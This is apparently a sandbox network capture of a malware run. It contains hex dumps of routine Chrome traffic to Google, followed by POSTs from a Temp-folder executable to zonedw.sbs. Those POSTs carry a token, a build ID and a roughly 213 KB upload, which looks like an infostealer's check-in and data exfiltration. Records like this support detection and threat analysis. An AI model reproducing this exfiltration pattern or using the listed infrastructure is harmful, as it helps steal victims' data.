2024-12-13 17:54:05 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:04 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-4E3lUJyVyvH6Zq82_c0lyA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-13 17:54:05 UTC	124	IN	Data Raw: 33 31 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 64 72 61 67 6f 6e 20 62 61 6c 6c 20 73 70 61 72 6b 69 6e 67 20 7a 65 72 6f 20 75 70 64 61 74 65 22 2c 22 65 70 69 63 20 67 61 6d 65 73 20 66 6f 72 74 6e 69 74 65 20 72 65 66 75 6e 64 73 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 74 72 61 6e 73 66 65 72 20 70 6f 72 74 61 6c 22 2c 22 67 65 6d 69 6e 69 64 73 Data Ascii: 319)]}'["",["dragon ball sparking zero update","epic games fortnite refunds","college football transfer portal","geminids
2024-12-13 17:54:05 UTC	676	IN	Data Raw: 20 6d 65 74 65 6f 72 20 73 68 6f 77 65 72 73 22 2c 22 73 74 61 6e 6c 65 79 20 72 65 63 61 6c 6c 73 20 74 72 61 76 65 6c 20 6d 75 67 73 22 2c 22 65 78 66 69 6c 20 73 74 65 61 6d 20 72 65 6c 65 61 73 65 22 2c 22 67 75 6b 65 73 68 20 77 6f 72 6c 64 20 63 68 65 73 73 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 22 2c 22 66 75 6c 6c 20 6d 6f 6f 6e 20 63 6f 6c 64 20 6d 6f 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f Data Ascii: meteor showers","stanley recalls travel mugs","exfil steam release","gukesh world chess championship","full moon cold moon"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNo
2024-12-13 17:54:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49950	172.217.19.228	443	4332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:04 UTC	506	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCNy9zQEIj8rNAQi5ys0BCKLRzQEIitPNAQik1s0BCPTWzQEIp9jNAQj5wNQVGPXJzQEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-13 17:54:05 UTC	1018	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 13 Dec 2024 17:54:04 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-13 17:54:05 UTC	372	IN	Data Raw: 31 38 65 32 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 18e2)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-13 17:54:05 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-13 17:54:05 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-13 17:54:05 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-13 17:54:05 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-13 17:54:05 UTC	446	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 30 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700280,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u
2024-12-13 17:54:05 UTC	272	IN	Data Raw: 31 30 39 0d 0a 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 44 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 45 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 Data Ascii: 109;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar Dd\u003ddocument.querySelector(\".gb_I .gb_A\"),Ed\u003ddocument.q
2024-12-13 17:54:05 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 44 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 45 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 43 64 28 5f 2e 6c 64 2c 44 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 46 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 Data Ascii: 8000#gb.gb_Rc\");Dd\u0026\u0026!Ed\u0026\u0026_.Cd(_.ld,Dd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Fd\u003dtypeof AsyncContext!\u003d\u003d\"undefined\"\u0026\u0026typeof AsyncContext.Snapshot\u003d\u003d\u003d\"function\"?a\u003d\u003ea\u0
2024-12-13 17:54:05 UTC	1390	IN	Data Raw: 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 Data Ascii: 3dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a\|0:void 0};_.Td\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a
2024-12-13 17:54:05 UTC	1390	IN	Data Raw: 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 53 64 28 5f 2e 4c 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 67 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 68 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 6a 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 55 64 5c 75 30 30 33 64 5f 2e 4d 64 3b 5f 2e 59 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 Data Ascii: ction(a,b){return _.Sd(_.Lc(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.vb(_.ge(a,b),c)};_.he\u003dfunction(a,b,c\u003d0){return _.vb(_.S(a,b),c)};_.je\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Ud\u003d_.Md;_.Yd\u003dclass{constructor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49957	172.217.19.228	443	4332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:04 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-13 17:54:05 UTC	933	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 13 Dec 2024 17:54:05 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-13 17:54:05 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-13 17:54:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49970	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:07 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:07 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 Data Ascii: ------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------1VSRIWTJM7G47Q90HLN7Cont
2024-12-13 17:54:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:54:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49975	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:09 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----N79HDBSJMYM7YUS0R1NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 37 39 48 44 42 53 4a 4d 59 4d 37 59 55 53 30 52 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 39 48 44 42 53 4a 4d 59 4d 37 59 55 53 30 52 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 39 48 44 42 53 4a 4d 59 4d 37 59 55 53 30 52 31 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------N79HDBSJMYM7YUS0R1NYContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------N79HDBSJMYM7YUS0R1NYContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------N79HDBSJMYM7YUS0R1NYCont
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 